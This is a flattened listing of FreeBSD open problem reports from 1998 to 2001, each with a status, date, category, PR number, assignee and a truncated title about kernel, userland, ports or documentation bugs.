Kernel support for sorted SHUTDOWN & SHUT a [1998/03/06] i386/5932 perfmon kernel code should check for non- f [1998/03/28] bin/6161 assar 2.2.6 kerberos servers are awfully visibl p [1998/03/31] bin/6183 iedowse quota hangups p [1998/03/31] kern/6184 No error if resulting file pos in lseek i a [1998/04/16] misc/6320 mike Sometimes nohup isn't good enough. o [1998/04/17] gnu/6338 Gnu tar not working properly with the -G o [1998/04/18] conf/6346 joe Kernel version strings need to relate to o [1998/05/12] misc/6612 bsd.man.mk can't handle man pages with ": o [1998/05/13] conf/6624 davidn One class with nologin=/etc/nologin: reje s [1998/05/17] kern/6668 babkin [PATCH] new driver: Virtual Ethernet driv s [1998/05/29] bin/6785 place for all the default dump flags s [1998/06/01] kern/6820 jesper cd9660_mount NULL pointer deref for no CD o [1998/06/22] ports/7023 portmgr bsd.port.(%|subdir.).mk patches for size s [1998/06/28] i386/7100 hm integrate pcvt configuration into the /et a [1998/07/01] bin/7136 kerberized telnetd doesn't use gettytab % s [1998/07/10] misc/7232 qa Suggestion for FreeBSD installation dialo o [1998/07/10] kern/7234 yokota keyboard problems during login immediatel o [1998/07/12] bin/7265 A warning flag is added to ln(1). f [1998/07/15] bin/7287 Incorrect domain name for MAP_UPDATE in m a [1998/07/19] bin/7324 Suggestions for minor modifications to ad s [1998/08/13] conf/7606 [PATCH] NIS Makefile.dist: NOPUSH replace s [1998/08/18] bin/7669 libalias does not IRC DCC packets under c o [1998/08/19] gnu/7687 description of default baud rate for cu c s [1998/08/22] kern/7722 Changes to acct format o [1998/09/03] bin/7828 Add a command line option to cp to make i s [1998/09/08] bin/7868 [almost patch]Morse Code Fixups o [1998/09/16] misc/7946 asami ccdconfig gives confusing error when give o [1998/09/18] bin/7973 gad lpd: Bad control file owner in case of re s [1998/09/21] kern/8015 nbm [patch] Some sysctl descriptions for the o [1998/09/27] ports/8063 portmgr [PATCH] Add multiple CDROM support to bsd o [1998/10/03] misc/8133 markm [patch] bug in telnetd (Kerberos IV) o [1998/10/19] kern/8376 CLOCK_VIRTUAL not implemented o [1998/10/27] i386/8474 repquota does not pick up NIS information a [1998/10/28] bin/8479 dd Final \'s in /etc/exports did not work in f [1998/10/30] kern/8498 dwmalone Race condition between unp_gc() and accep f [1998/11/03] bin/8553 gshapiro /usr/libexec/mail.local doesn't handle "> o [1998/11/27] i386/8867 qa /stand/sysinstall core dumps (signal 11) o [1998/12/16] ports/9107 portmgr Addition to bsd.port.mk for searching mul a [1998/12/18] bin/9123 kris pax can't read tar archives that contain f [1998/12/28] misc/9220 ache nvi: catalog: mistake in Russian error me o [1998/12/29] bin/9233 gmp's mpq_add and mpq_sub are buggy a [1999/01/05] bin/9333 jkoshy timestamp dump's progress o [1999/01/19] kern/9570 dfr ed(4) irq config enhancement o [1999/01/22] kern/9619 Restarting mountd kills existing mounts f [1999/01/25] kern/9679 fix for uninterruptible open in portal fi a [1999/01/28] bin/9770 kris An openpty(3) auxiliary program o [1999/01/29] i386/9777 cg Generic AD1816 sound suport in Luigi's pc o [1999/01/31] ports/9840 portmgr patch allows ports to fetch their sources o [1999/02/01] bin/9868 Patch to add "date -a" o [1999/02/01] kern/9869 When using macros out of function, they s o [1999/02/01] conf/9874 idle-timeout facilities in /etc/login.con o [1999/02/09] i386/9991 new driver for National Instruments GPIB o [1999/02/11] bin/10030 markm Kerberized telnet fails to encrypt when a o [1999/02/25] docs/10240 wosch We need a script which check if our web m f [1999/02/26] bin/10283 Race condition in rc.network o [1999/03/02] bin/10358 yar ftp(1) has problems with long pathnames f [1999/03/07] i386/10465 mdodd Must disable ex0 to install. f [1999/03/15] kern/10609 adjtime bug (tv_sec > 2147) and enhanceme o [1999/03/15] bin/10611 timed enhancement o [1999/03/17] kern/10641 groudier Default sync rate in ncr SCSI driver is s o [1999/03/19] gnu/10670 peter cvs doesn't allow digits in local keyword o [1999/03/19] kern/10673 wpaul Non-ASCII chars on serial console with Re o [1999/03/19] ports/10682 portmgr List mirror sites in MASTER_SITE_BACKUP - o [1999/04/03] bin/10931 biff b o [1999/04/08] kern/11020 popen does not honor ISO 9899 syntax o [1999/04/08] bin/11036 markm Perl does not honor -DNOMAN o [1999/04/11] bin/11085 Per-host configuration for syslog.conf o [1999/04/11] bin/11092 readlink(1) from OpenBSD f [1999/04/13] bin/11114 standardsmake(1) does not work as documented with o [1999/04/14] ports/11134 hoek existense of /usr/obj/usr/ports/shells/ba o [1999/04/16] i386/11165 IBCS2 don't work correctly with PID_MAX 9 a [1999/04/16] bin/11168 davidn pw(8) usermod does not recognize -w flag f [1999/04/20] bin/11236 mountd fails to properly check for kernel o [1999/04/20] bin/11248 Shuffle o [1999/04/23] kern/11293 brian FreeBSD's PPP implementation of LQM appea o [1999/04/23] bin/11294 direct logging to other hosts (no local s o [1999/05/06] misc/11553 /usr/share/misc/latin1 (new file submissi o [1999/05/19] kern/11789 obrien ELF machine definition missing for ARM f [1999/05/29] bin/11929 symorder doesn't work on elf format objec o [1999/06/03] kern/12014 alfred Fix SysV Semaphore handling o [1999/06/06] gnu/12046 markm Perl subsystem does not install all tutor o [1999/06/07] kern/12071 [PATCH] large scale IP aliasing o [1999/06/08] i386/12088 Enhancement to ed driver for Linksys 10/1 o [1999/06/16] bin/12244 realpath() fails when there is no permiss o [1999/06/18] bin/12280 jdp LD_IGNORE_MISSING_OBJECTS not honored for o [1999/06/21] conf/12324 qa Sysinstall's fdisk partition editor is mi o [1999/06/21] ports/12325 portmgr Adds refetch functionallity to bsd.port.m s [1999/06/23] bin/12358 ken Patch: "camcontrol help" should go to std o [1999/06/26] bin/12398 fsck in free(): warning: pointer to wrong o [1999/07/06] kern/12543 dg [PATCH] cumulative error counters for fxp o [1999/07/07] bin/12545 peter kldload(8) should be more sensitive to er o [1999/07/08] ports/12566 billf a guide to pyrotechnics o [1999/07/25] bin/12801 nvi infinite recursion with options "left o [1999/08/03] bin/12939 add flag to quota to suppress NFS quota c o [1999/08/04] ports/12952 portmgr make _PORT_USE touch cookies by variable, f [1999/08/04] kern/12966 silby receiver lockups in vr0 driver f [1999/08/05] i386/12993 gibbs "ahc0: Data Parity Error Detected during o [1999/08/09] bin/13042 make doesn't handle wildcards in subdirec o [1999/08/09] bin/13043 minigzip -c option support. o [1999/08/11] bin/13068 billf Don't stamp out score files! o [1999/08/11] bin/13072 billf Extensions to biff(1) o [1999/08/11] bin/13073 billf Extensions to mesg(1) o [1999/08/12] bin/13108 authunix_create_default includes egid twi a [1999/08/13] bin/13128 cy pkg_delete doesn't handle absolute pathna f [1999/08/18] kern/13232 panic("rtfree"); when sending bootp reque o [1999/08/21] bin/13309 billf Fixes to nos-tun o [1999/08/22] misc/13326 additional timeval interfaces for ' cannot be used in "via" o [2000/05/30] kern/18909 dwmalone select(2) timeout limited to 100000000 se o [2000/06/01] ports/18960 portmgr Add USE_APACHE to bsd.port.mk for Apache o [2000/06/01] bin/18961 green sshd does not print before motd o [2000/06/03] bin/18992 brian log packets blocked by filter rules o [2000/06/03] misc/18997 markm Kerberos5 CFLAGS needed f [2000/06/04] conf/19001 Delayed fsck + mount of insignificant fil o [2000/06/06] ports/19051 asami New target for bsd.port.mk : fetchdepends f [2000/06/06] bin/19057 offer of patch to uname that produces pre o [2000/06/07] ports/19112 portmgr files with names something,v in patches d o [2000/06/09] kern/19156 jkh Enable the doFS.sh to run in arbitrary lo o [2000/06/11] kern/19213 SC_DFLT_FONT compile option breaks kernel f [2000/06/13] conf/19236 sanpei not-existing PCMCI cards in pccard.conf.s o [2000/06/13] bin/19239 login allows users to login remotely with o [2000/06/13] misc/19246 portmgr Poor error message when fetching files wi o [2000/06/13] ports/19253 dirk mod_php4 has pkg dependency when not usin o [2000/06/14] ports/19270 portmgr Ports build mechanism doesn't check wheth o [2000/06/15] gnu/19327 Fix to build 'a.out' binary. o [2000/06/19] misc/19391 emulationEvilness with Linux Terminus, causes X to o [2000/06/20] misc/19406 setenv() allocates memory which is not fr o [2000/06/22] ports/19448 markm filename input broken o [2000/06/23] misc/19467 green OpenSSH (as an rsync tunnel) blocks forev o [2000/06/24] kern/19490 faith0 network device has high number of o [2000/06/26] kern/19535 adrian procfs_rlimit tidyup s [2000/06/28] conf/19573 des Dot Files for Optional Shells o [2000/06/29] ports/19591 ports ssh2 port ignores 'ignorenologin' from lo o [2000/06/30] ports/19594 trevor update port: qrash o [2000/07/01] bin/19635 add -c for grand total to df(1), like du( o [2000/07/02] gnu/19642 kbyanc patch to merge OpenBSD changes to patch(1 o [2000/07/02] ports/19650 asami python package causes segmentation fault o [2000/07/03] bin/19683 green mount displays incorrect mount point on f a [2000/07/03] kern/19686 yokota splash screen fails o [2000/07/05] kern/19720 kbyanc more sysctl signed-ness patches o [2000/07/07] kern/19756 Inability to use linux extended partition o [2000/07/07] bin/19772 df output wrong for union-mounts o [2000/07/08] kern/19782 dirk mkisofs 1.12.1 (i386-unknown-freebsd4.0) f [2000/07/09] misc/19798 cg 4DWAVE doesn't work. o [2000/07/10] kern/19827 yokota psm flag bit9(NOIDPROBE) doesn't work cor o [2000/07/10] misc/19837 ambrisko Run Fit it floppy from serial port o [2000/07/12] ports/19868 portmgr modify ports/Mk/bsd.port.mk to remove ALL o [2000/07/12] kern/19871 alfred select on named pipes always returns 'ava o [2000/07/14] kern/19913 des add SYN+FIN counter o [2000/07/15] kern/19966 new syscons screensaver o [2000/07/18] gnu/20004 FBSD4 gcc __attribute__(constructor) not o [2000/07/19] bin/20042 "rsh -t" doesn't timeout if rcmd(3) never o [2000/07/20] bin/20054 ftpd: rotating _PATH_FTPDSTATFILE losts x o [2000/07/24] misc/20139 msmith Simple typo in src/share/examples/ppi/ppi o [2000/07/24] misc/20159 strftime() can't produce ISO8601 format t o [2000/07/24] misc/20166 billf Corrections & additions to games/quiz/dat o [2000/07/26] bin/20204 ps more doesn't handle 8-bit characters prop o [2000/07/27] kern/20214 dec kernel routing bug for nexthop is routed o [2000/07/28] ports/20270 reg libtool needlessly runs ldconfig after in o [2000/07/29] kern/20297 cg Joystick is not enabled with es1370 based o [2000/07/31] misc/20326 marcel [PATCH] installkernel fails if DESTDIR is o [2000/07/31] misc/20333 ftp login fails on unix password when s/k o [2000/08/01] kern/20352 yokota Configuring a synaptics touchpad o [2000/08/02] ports/20359 demon New port: Apache-mod_perl_guide f [2000/08/02] bin/20371 murray dhclient inserts bogus configurations o [2000/08/03] kern/20384 n_hibma Phase errors with Zip650 CD on USB o [2000/08/03] kern/20389 ken "device pass" required for CD ripping o [2000/08/03] bin/20391 jhb sysinstall should check debug.boothowto s o [2000/08/04] kern/20410 sio support for high speed NS16550A, ST16 o [2000/08/05] conf/20436 Can't make only cd0 under 4.1-STABLE o [2000/08/07] misc/20457 davidn pw command doesn't generate random passwo o [2000/08/09] bin/20501 mjacob extra flag to dump to offline autoloaders a [2000/08/10] ports/20520 olgeni New port: lang/mercury o [2000/08/10] docs/20528 doc sysconf(3) manpage doesn't mention posix. o [2000/08/10] kern/20529 wpaul gigabit cards fail to link o [2000/08/11] i386/20537 msmith HP NetRAID controller error when rebootin a [2000/08/14] ports/20610 patrick New port of cgoban2 o [2000/08/15] bin/20613 des fetch -T n is not timeout correctly when o [2000/08/16] i386/20660 wpaul if_wi provides 802.11 src and dst, not et o [2000/08/17] ports/20678 portmgr make SORTED_MASTER_SITES_CMD variable ove o [2000/08/21] bin/20742 ps Weird problem with 'more' on 4-1-STABLE o [2000/08/23] ports/20795 msmith FBSD 4.x: Citrix client with drive mappin o [2000/08/23] bin/20799 davidn top's problem o [2000/08/23] i386/20803 mdodd ep0 driver finds additional "shadow" ep c o [2000/08/23] kern/20804 deadlocking when using vnode disk file an o [2000/08/24] bin/20824 ftpd returns, "ad0s1a: not a plain file." o [2000/08/24] misc/20830 lile kernel link problems with Olicom token ri f [2000/08/25] i386/20845 Cyclades cy driver incompatible with Cycl o [2000/08/26] kern/20878 wpaul Patch to add support for the 3c556B MiniP o [2000/08/26] bin/20881 kris There's no reason not to build DNSsec-DSA o [2000/08/27] bin/20889 dwmalone syslogd.c still uses depreciated domain A o [2000/08/28] bin/20908 qa /stand/sysinstall too limited in selectio o [2000/08/29] misc/20920 yokota window(1) interferes with screensaver o [2000/08/29] kern/20927 ume dmesg output: looutput: mbuf allocation f o [2000/08/30] bin/20944 ru natd enhancements, default config file an o [2000/09/02] bin/20996 kris permissions on /usr/bin/opiepasswd o [2000/09/02] bin/21008 gad Fix for lpr's handling of lots of jobs in o [2000/09/04] bin/21024 pow() ERANGE bug o [2000/09/05] conf/21059 marcel `make -jN buildkernel' can't keep source o [2000/09/05] conf/21066 Proposed change in rc scripts o [2000/09/05] misc/21070 marcel default setting of ${SUP} in Makefile.inc o [2000/09/06] bin/21074 davidn chkgrp vs group(5) inconsistency f [2000/09/06] bin/21075 dwmalone top: can't allocate sufficient memory o [2000/09/06] bin/21080 mjacob dump doesn't use eject tape device correc p [2000/09/09] bin/21142 ru [PATCH] avoid errors from "make objlink" o [2000/09/09] kern/21156 yokota [PATCH] inconsistency in scmouse vs xterm s [2000/09/10] bin/21178 ken voltag selector, and unload support for c o [2000/09/12] kern/21222 dillon wrong behavior of concurrent mmap()s on N o [2000/09/12] kern/21229 Proper value for vfs.nfs.access_cache_tim o [2000/09/16] bin/21312 more incorrectly redraws screen on xterm f [2000/09/16] ports/21313 mbr vmwarIPv6 and vmware2 panic: Fatal trap 1 o [2000/09/16] bin/21315 Shells often behave oddly when executing o [2000/09/22] misc/21494 yar ftpd can't handle /etc/chroot entries wit o [2000/09/24] bin/21519 sys/dir.h should be deprecated some more o [2000/09/24] bin/21531 csh/tcsh provide no way to see/adjust new f [2000/09/26] bin/21570 dougb [PATCH] Add -r option to /usr/bin/mail, q o [2000/09/28] ports/21621 portmgr Update port: devel/libtool to 1.3.5 f [2000/09/28] kern/21623 wpaul Chipset SiS630E / NIC SiS 900 o [2000/09/29] misc/21644 /usr/include/sys/mman.h uses a type defin s [2000/09/30] bin/21659 Berkeley db library is statically compile o [2000/10/01] i386/21672 obrien AMD Duron Rev. A0 reports incorrect L2 ca o [2000/10/01] misc/21675 Better and more disktab entries for MO dr o [2000/10/02] conf/21695 ifconfig_XXX_aliasY in rc.conf; Y must be o [2000/10/02] misc/21715 The freebsd mail list digifier loses MIME o [2000/10/04] bin/21751 ken libcam's cam_real_open_device() may lose o [2000/10/04] kern/21754 n_hibma Sound stops working when NetGear USB Devi o [2000/10/05] bin/21766 [PATCH] add -s (skip) flag to head(1) o [2000/10/05] docs/21767 green sample sshd_config errors for kerberos o [2000/10/05] kern/21768 rwatson shouldn't trailing '/' on regular file sy o [2000/10/06] bin/21806 lock(1) currently defaults to 15 minute t a [2000/10/06] kern/21807 [patches] Make System attribute correspon o [2000/10/07] docs/21826 wollman ARP proxy feature lacks documentation o [2000/10/09] kern/21859 Allow the syncer to be slowed down o [2000/10/09] ports/21885 portmgr bsd.port.mk: test for old layout is too o [2000/10/10] ports/21903 portmgr bsd.ports.mk - automake/aclocal adds o [2000/10/14] conf/21994 Config of Anonftp (at install) always cre p [2000/10/14] gnu/21996 use of -s and -C causes tar to dump core o [2000/10/16] bin/22033 [PATCH] to pw(8) to allow encrypted passw o [2000/10/16] bin/22034 nfsstat lacks useful features found in So o [2000/10/17] kern/22065 luigi Patch to add support to ipfw for per rule o [2000/10/18] misc/22073 xonsole: couldn't open console o [2000/10/18] conf/22102 Local scripts get run before securelevel o [2000/10/20] ports/22149 portmgr Enhance the "Old port layout" message fro o [2000/10/21] bin/22182 vi options noprint/print/octal broken o [2000/10/21] kern/22185 Identical IP addresses on two broadcast i o [2000/10/21] misc/22190 A threaded read(2) from a socketpair(2) f o [2000/10/21] bin/22198 inet_ntop may set errno to ENOSPC and nee o [2000/10/26] conf/22308 mounting NFS during boot blocks if host m o [2000/10/26] misc/22332 request to add vtys to /etc/ttys o [2000/10/27] bin/22351 sed(1) fails with backslash on buffer bou o [2000/10/29] ports/22399 msmith PIB 1.2 still looks for MD5 info in files o [2000/10/30] ports/22412 taoka two extraneous ports and one name change o [2000/10/31] bin/22442 greid [PATCH] Increase speed of split(1) s [2000/11/01] docs/22470 doc man 3 msgrcv's BUGS section needs updatin o [2000/11/02] ports/22550 cy Patch for conserver for log file rotation o [2000/11/04] kern/22602 CDRoms checked during shutdown (umount) o [2000/11/04] bin/22612 schweikh crontab -e failures o [2000/11/06] conf/22645 Cannot override "ignore" in /etc/mail.rc o [2000/11/07] misc/22660 termcap kterm entry tc=xterm is wrong a [2000/11/08] misc/22696 luigi picobsd build with router configuration c o [2000/11/08] ports/22698 portmgr Ports' rc.d files should use rc.conf o [2000/11/09] bin/22730 fenner tcpslice doesn't handle long file offsets o [2000/11/14] bin/22860 yar [PATCH] adduser & friends with '$' in use o [2000/11/14] docs/22861 dd newsyslog man page is misleading and inco o [2000/11/15] kern/22868 getsockname may return an incorrect addre o [2000/11/15] misc/22873 markm Perl's core'h conflicts with ncurses.h o [2000/11/16] i386/22900 patch: Adds Brand ID support to src/sys/i o [2000/11/17] misc/22914 bootinst messages are not updated s [2000/11/17] conf/22916 green Ssh/sshd binaries lacks kerberos support o [2000/11/17] bin/22933 green Typographical error in ssh.1 f [2000/11/20] ports/22995 grog Update port: x11-servers/x2x (fix ports/2 o [2000/11/23] conf/23063 ru [PATCH] for static ARP tables in rc.netwo o [2000/11/24] bin/23082 dwmalone ntpd has only one reference-clock parser o [2000/11/25] bin/23097 Enhance WEP some more including ability t o [2000/11/27] misc/23148 getopt(3) works non-intuitively? o [2000/11/29] bin/23178 'talk' not doing right thing o [2000/11/29] bin/23180 Certain KOI8 characters are treated as "w o [2000/12/01] bin/23204 length of salt in crypt() is not the same o [2000/12/02] bin/23233 kris Reincorporate /usr/bin/error in the FreeB a [2000/12/03] bin/23254 fenner yacc accepts bad grammer o [2000/12/05] kern/23304 standardsPOSIX clock_gettime, clock_getres return f [2000/12/05] kern/23314 aic driver fails to detect Adaptec 1520B f [2000/12/07] misc/23362 fenner tcpdump wrong on sppp CISCO_HDLC encoded o [2000/12/07] misc/23366 mmap() non conforming o [2000/12/07] gnu/23367 some src/gnu Makefiles are missing $FreeB a [2000/12/09] conf/23402 qa sysinstall upgrade ought to check partiti o [2000/12/11] bin/23472 mp gdb weirdness on programs compiled with - o [2000/12/13] kern/23520 sb0 old style audio support in 4.2-RELEAS o [2000/12/13] misc/23539 marcel make installworld from nfs mounted /usr/s o [2000/12/14] kern/23546 tanimura [PATCH] csa DMA-interrupt problem o [2000/12/14] ports/23560 portmgr linux-jdk/Makefile assumes default `patch o [2000/12/15] i386/23562 telnetd doesn't show message in file spec o [2000/12/15] ports/23581 portmgr Updates to bsd.port.mk to detect changing o [2000/12/17] gnu/23598 Merge libgcc_r with libgcc o [2000/12/17] ports/23602 portmgr Recursive distclean for bsd.port.mk w/pat o [2000/12/18] bin/23635 mike [PATCH] whois enhancement - smarter whois o [2000/12/24] kern/23814 .au sound files < 528 bytes actual data d o [2000/12/24] ports/23822 trevor mtree entries for German X11 man pages a [2000/12/28] bin/23912 sheldonh underflow of cnt in vs_paint() by O_NUMBE o [2000/12/29] bin/23944 Patch for ftpd to add a cd after the chro o [2001/01/04] bin/24066 mp gdb can't detach from programs linked wit o [2001/01/06] ports/24120 portmgr "/usr/ports/Mk/bsd.port.mk", line 626: In o [2001/01/07] misc/24132 mp gdb output is wrong (same as #13427 ?) o [2001/01/07] kern/24141 sound emu10k1 has trouble playing non-44.1KHz s o [2001/01/10] ports/24214 portmgr [PATCH] verbose 'make index' o [2001/01/11] ports/24259 steve port of open-motif on make install compla o [2001/01/12] ports/24292 portmgr update-patches target in ports/Mk/bsd.por o [2001/01/12] ports/24299 ports Configure the synaptics touchpad. o [2001/01/15] ports/24361 portmgr wrong filemodes o [2001/01/16] misc/24384 4.1 Cant add entry to neighbour discovery o [2001/01/16] bin/24390 Replacing old dir-symlinks when using /bi o [2001/01/16] kern/24393 Patch to msdosfs to handle a kind of inco o [2001/01/18] bin/24435 Changing slice type causes Auto-partition o [2001/01/20] bin/24485 [PATCH] to make cron(8) handle clock jump o [2001/01/20] ports/24493 msmith Pib maker function unable to launch xterm a [2001/01/21] kern/24512 jesper Sent ICMP unreach when packet not for us o [2001/01/21] misc/24513 peter new options for pppd o [2001/01/21] conf/24515 Fix for find(1) warning in /etc/rc o [2001/01/21] bin/24521 green ssh-agent exits when authenticating DSA v o [2001/01/22] kern/24528 Bad tracking of Modem status o [2001/01/23] bin/24592 cjc dmesg.boot Gets Overwritten without Reboo o [2001/01/25] ports/24651 mharo portlint gives a bogus warning o [2001/01/26] ports/24658 jkh Enhancement to src/release/Makefile o [2001/01/26] alpha/24663 alpha Console output gets scribbled into /var/l o [2001/01/27] gnu/24681 gcc 2.95.3 cannot compile rince.c from IO o [2001/01/27] ports/24687 ports QUAKE FORGE & SVGALIB o [2001/01/30] ports/24736 trevor New port: SGI's open inventor (graphics/i o [2001/01/30] bin/24742 send adduser.message before dirs are crea o [2001/01/30] ports/24743 chuckr a2ps port installs files in / o [2001/01/30] misc/24746 green SSH terminal hangs on large paste of data o [2001/01/30] ports/24749 dirk mysql323-server pkg-install script doesn' o [2001/01/31] bin/24757 ftpd not RFC compliant o [2001/02/01] docs/24786 doc missing FILES descriptions in sa(4) o [2001/02/02] docs/24797 phk when using MALLOC_DEFINE sys/param.h and o [2001/02/03] kern/24827 yokota Erratic Intellimouse Explorer in 4.1 and o [2001/02/03] bin/24828 [PATCH] ntpd compilation and additional r f [2001/02/04] gnu/24844 gdb does not support Linux threads a [2001/02/05] docs/24869 keramida Some text elf.5 is duplicated o [2001/02/05] kern/24882 ktrace not syncing .out file before panic o [2001/02/06] kern/24900 Server logs:indfcntl(8, F_SETFL, 4): Inap o [2001/02/06] kern/24902 IPC Message Queue number to big o [2001/02/06] misc/24907 qa Options screen at MenuMedia menu problem o [2001/02/07] ports/24940 demon prolem with Tnm::icmp echo command due to o [2001/02/08] bin/24953 green adduser ignores passwd_format in login.co o [2001/02/08] kern/24959 jesper proper TCP_NOPUSH/TCP_CORK compatibility o [2001/02/08] i386/24963 perfmon(4) doesn't work on SMP systems o [2001/02/09] ports/24983 portmgr Emacs ports have misleading names p [2001/02/11] bin/25012 tar(1) as root does not preserve ownershi o [2001/02/11] bin/25013 mv(1) cannot move unresolvable symlinks a o [2001/02/11] bin/25015 cp: options -i and -f do not work as docu p [2001/02/11] docs/25016 ru symlink(7) manpage says symlinks have no o [2001/02/11] bin/25017 cp -pRP does not preserve symlink ownersh o [2001/02/11] kern/25018 lstat(2) returns bogus permissions on sym o [2001/02/12] ports/25031 ache www/apache: dbmmanage fails verifying md5 o [2001/02/13] bin/25070 newsyslog(8) should send signals only onc o [2001/02/13] bin/25085 msmith mlxcontrol utility fails silently if devi o [2001/02/15] misc/25109 Fujitsu MO device MCC3064AP could't be c o [2001/02/19] misc/25218 peter mailwrapper invokes sendmail when resourc o [2001/02/20] bin/25241 luigi ipfw shouldn't show dynamics rules when s f [2001/02/21] bin/25263 green openssh and /etc/login.access does not wo o [2001/02/21] bin/25273 add fs type feature to vnconfig(8) to all f [2001/02/21] kern/25275 X server freezes system randomly on pentu f [2001/02/22] bin/25278 dd bs accepts -s -c but not -sc o [2001/02/22] alpha/25284 alpha PC164 won't reboot with graphics console o [2001/02/23] ports/25313 wosch Script source displayed at http://www.nl. o [2001/02/26] misc/25378 kris update contrib/libgmp to newer version (3 o [2001/02/26] kern/25386 cg Incorrect mixer registers (line & synth) o [2001/02/27] kern/25445 kernel statistics are displayed in wrong f [2001/02/28] gnu/25459 Dumpvalue.pm says SYNOPSYS instead of SYN o [2001/02/28] bin/25462 daemon(3) fails if called by a session le f [2001/02/28] i386/25463 PS/2 mouse sync problems with KVM switch o [2001/03/01] bin/25477 billf pam_radius fix to allow null passwords fo o [2001/03/02] ports/25490 wosch [PATCH] fix various bugs in stat(1) p [2001/03/02] misc/25499 buffer paste functionality from keyboard o [2001/03/04] kern/25521 Laptop with FreeBSD4.2 freezes in battery f [2001/03/04] conf/25527 jdp `man ldconfig' does not reflect its behav o [2001/03/04] ports/25531 portmgr INSTALL_* macros fail for non-root users a [2001/03/05] ports/25560 ports New port: ftp/kbear: An ftp client for KD o [2001/03/05] ports/25564 obrien Port ups-debug doesn't build on the alpha o [2001/03/06] bin/25572 sshd core dump o [2001/03/06] ports/25576 jmz XFree86-4 port installs manual pages with s [2001/03/07] bin/25587 des Add Solaris-like functionality to truss(1 o [2001/03/07] bin/25598 patch to let ftpd output message when cha s [2001/03/09] bin/25627 Cannot append hash after .elif in Makefil a [2001/03/11] ports/25708 dougb pine4 port hard-code /usr/local/include o [2001/03/11] bin/25723 green OpenSSH on 4.2 excessively regenerates RS o [2001/03/12] bin/25724 quota(1) outputs wrong limits about NFS q o [2001/03/12] kern/25733 mismatch between error reporting in smbus o [2001/03/12] bin/25736 ac -d option probrem with overdays logon o [2001/03/13] kern/25777 atime not updated on exec o [2001/03/13] ports/25779 portmgr (patch) make fetch-list should list all m o [2001/03/14] gnu/25794 markm [PATCH] make perl use a decent random num f [2001/03/14] ports/25815 portmgr [PATCH] Port build collision fix. o [2001/03/15] conf/25829 IPSec config in rc.network doesn't allow o [2001/03/16] kern/25866 more than 256 ptys, up to 1302 ptys. o [2001/03/18] kern/25909 4.x kernel freezes on P3-Asus CUSL2-C mot o [2001/03/18] kern/25910 cg Kernel sound driver may die if a program o [2001/03/19] misc/25917 green Paste thrue SSH Secure Shell v.2.4.0 (bui f [2001/03/19] kern/25923 vm_map.h defines a macro called "min_offs o [2001/03/21] misc/25984 bsd.prog.mk doesn't link C++ programs pro f [2001/03/22] docs/26003 rwatson getgroups(2) lists NGROUPS_MAX but not sy o [2001/03/22] bin/26005 MIME quoted-printable encoding added to v a [2001/03/22] docs/26006 jeff Changing zone(9) man page o [2001/03/22] kern/26016 VMWare is crash on SMP machine f [2001/03/23] misc/26035 System hangs when playing mp3 on PCI Maes o [2001/03/27] conf/26145 [PATCH] There is no make.conf equivalent o [2001/03/28] ports/26192 ports apel appeared both in xemacs/site-package o [2001/03/29] bin/26201 telnet SRA password exchange trap when no o [2001/04/01] kern/26277 ppc driver doesn't work with port 0x3BC p o [2001/04/02] docs/26286 chris *printf(3) etc should gain format string o [2001/04/02] ports/26303 adrian Wrong permission on Squid24's errors dire o [2001/04/03] kern/26316 Booting FreeBSD on VMware2 with 2 or 3 et o [2001/04/03] misc/26323 Quota system create zero-length files o [2001/04/03] kern/26324 dillon Defaults for NFS mounts over TCP are slow o [2001/04/04] kern/26348 [pcvt] scon -s, page fault in HP mode o [2001/04/04] bin/26359 [PATCH] a minor nit in how netstat detect o [2001/04/06] bin/26375 markm PAMized su allows non-wheel members to su o [2001/04/06] kern/26385 VMWare reboots entire system after starti o [2001/04/09] kern/26454 cg mixer volume settings on Maestro-2E (Diam o [2001/04/09] bin/26468 pkg_delete clears dependencies after runn o [2001/04/10] conf/26488 incomplete named sandbox information a [2001/04/13] docs/26532 green ".Ql ?" becomes "`'?" through nroff (and a [2001/04/13] kern/26534 Add an option to ipfw to log gid/uid of w o [2001/04/13] kern/26547 "lnc" problem with shared memory mode wit o [2001/04/13] i386/26562 /dev/lpt0 returns EBUSY when attempting t o [2001/04/14] kern/26563 ioctl(SNDCTL_DSP_SPEED) returns -1 when f o [2001/04/14] kern/26584 kernel boot messages aren't logged correc f [2001/04/16] kern/26608 when boot Freebsd 4.2 Release from the c o [2001/04/16] kern/26618 unmount(2) can't unmount a filesystem who p [2001/04/17] misc/26646 srand() provides only 8-bit table o [2001/04/17] misc/26649 diskless client can't share root with ser o [2001/04/17] misc/26658 update to src/usr.bin/calendar/calendars/ o [2001/04/18] bin/26686 Freeze at boot from 4.3-RC4 floopies - US o [2001/04/18] misc/26695 CHANGE REQUEST: kill(all) -l output o [2001/04/19] misc/26720 Both .cshrc and .profile should have the o [2001/04/20] kern/26740 rwatson [PATCH] jail improvement o [2001/04/22] kern/26787 dd sysctl change request o [2001/04/23] kern/26798 cvsup 4.3-RC -> 4.3-STABLE causes problem o [2001/04/23] ports/26801 ports cyrus port should add periodic file to pr s [2001/04/23] bin/26803 des Fix fetch to allow FTP puts in '-o' & all o [2001/04/24] i386/26812 peter old bootstrap /sys/i386/boot/... still in a [2001/04/25] bin/26854 sound Better fix for ESS Technology Maestro-2E o [2001/04/26] misc/26879 mkfilter not installed, yet referred to v s [2001/04/26] ports/26882 kde KDE should use ca-roots port for SSL cert f [2001/04/26] ports/26884 ports new port for visualworks 5i.3 o [2001/04/27] ports/26904 jim New port(?): net/everybuddy-i18n (i18n pa o [2001/04/28] bin/26919 qa sysinstall' fdisk can ONLY set bootable f o [2001/04/29] docs/26943 doc [patch] description of :C modifier is mis o [2001/04/30] i386/26994 obrien AMD Athlon Thunderbird not known to ident o [2001/05/01] kern/27008 kernel function sysbeep(xxx, 0) does prod o [2001/05/01] ports/27019 marcel patch supplied in PR ports/26976 breaks l o [2001/05/02] misc/27039 new syscons screensaver f [2001/05/02] misc/27041 modify src/release/Makefile to make anoth o [2001/05/04] ports/27075 sobomax Port java/javavmwrapper installs no man p o [2001/05/04] ports/27079 sobomax Improvements for javavmwrapper? o [2001/05/06] bin/27163 cracauer sh trap TSTP () deadly hangs o [2001/05/06] ports/27167 ports ETHOberonV4 won't run a [2001/05/07] ports/27182 mharo Teach portlint to recognize RUN_DEPENDS=$ o [2001/05/07] bin/27188 fix of rsh non-interactive mode behaviour o [2001/05/07] misc/27190 Day light savings in Mexico. o [2001/05/08] ports/27200 greid new port: bed (binary editor) o [2001/05/08] i386/27216 qa Can not get to shell prompt from serial c o [2001/05/09] kern/27232 On NFSv3 mounted filesystems, stat return o [2001/05/10] bin/27258 getty didn't check if if= isn't empty o 